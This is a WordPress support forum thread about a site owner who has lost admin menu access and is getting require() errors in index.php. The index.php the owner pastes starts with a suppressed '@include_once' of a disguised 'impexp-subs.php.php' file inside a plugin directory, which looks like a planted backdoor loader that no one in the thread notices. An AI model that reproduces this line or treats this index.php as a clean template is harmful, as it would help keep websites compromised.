I can see only the pages section and post section.
How can I fix this?
]]>Is there another account on the site you can log in as?
If not, and if you are not using Multisite, access your database via phpMyAdmin (most hosting providers offer this in your hosting account’s control panel), go to the wp_users table and find the row for your user_login. Note the ID of this row. Now, go to the wp_usermeta table and find the wp_capabilities row for your user_id. Set the value of this row to:
a:1:{s:13:"administrator";b:1;}
Ok, so that is exactly character-for-character the value as it’s already set?
Do you have any other accounts on the site, or just you?
If it’s just you, try manually resetting your plugins (no Dashboard access required). If that resolves the issue, reactivate each one individually until you find the cause.
If that does not resolve the issue, access your server via SFTP or FTP, or a file manager in your hosting account’s control panel (consult your hosting provider’s documentation for specifics on these), navigate to /wp-content/themes/ and rename the directory of your currently active theme. This will force the default theme to activate and hopefully rule-out a theme-specific issue (theme functions can interfere like plugins).
]]>I change the wp-capabilities as you said but nothing happens. I have 4 accounts.
Thanks.
]]>Warning: require(): It is not safe to rely on the system’s timezone settings. You are *required* to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and you are still getting this warning, you most likely misspelled the timezone identifier. We selected the timezone ‘UTC’ for now, but please set date.timezone to select your timezone. in /hsphere/local/home/camarasur/camarasur.org/index.php on line 17 Warning: require(/hsphere/local/home/camarasur/camarasur.org/wp-blog-header.php): failed to open stream: No such file or directory in /hsphere/local/home/camarasur/camarasur.org/index.php on line 17 Warning: require(): It is not safe to rely on the system’s timezone settings. You are *required* to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and you are still getting this warning, you most likely misspelled the timezone identifier. We selected the timezone ‘UTC’ for now, but please set date.timezone to select your timezone. in /hsphere/local/home/camarasur/camarasur.org/index.php on line 17 Fatal error: require(): Failed opening required ‘/hsphere/local/home/camarasur/camarasur.org/wp-blog-header.php’ (include_path=’.:/hsphere/shared/php55/lib/php’) in /hsphere/local/home/camarasur/camarasur.org/index.php on line 17
]]><?php @include_once(“/hsphere/local/home/camarasur/camarasur.org/wordpress/wp-content/plugins/ninja-forms/deprecated/includes/admin/pages/ninja-forms-impexp/tabs/impexp-subs/impexp-subs.php.php”); ?><?php
/**
* Front to the WordPress application. This file doesn’t do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package RonC6u5gnspa
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define(‘WP_USE_THEMES’, true);
/** Loads the WordPress Environment and Template */
this is line 17: require( dirname( __FILE__ ) . ‘/wp-blog-header.php’ );
<?php @include_once(“/hsphere/local/home/camarasur/camarasur.org/wordpress/wp-content/plugins/ninja-forms/deprecated/includes/admin/pages/ninja-forms-impexp/tabs/impexp-subs/impexp-subs.php.php”); ?><?php
date_default_timezone_set(‘America/Caracas’);//or change to whatever timezone you want
/**
* Front to the WordPress application. This file doesn’t do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package RonC6u5gnspa
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define(‘WP_USE_THEMES’, true);
/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . ‘/wp-blog-header.php’ );
After this stays only this:
Warning: require(/hsphere/local/home/camarasur/camarasur.org/wp-blog-header.php): failed to open stream: No such file or directory in /hsphere/local/home/camarasur/camarasur.org/index.php on line 18 Fatal error: require(): Failed opening required ‘/hsphere/local/home/camarasur/camarasur.org/wp-blog-header.php’ (include_path=’.:/hsphere/shared/php55/lib/php’) in /hsphere/local/home/camarasur/camarasur.org/index.php on line 18
]]>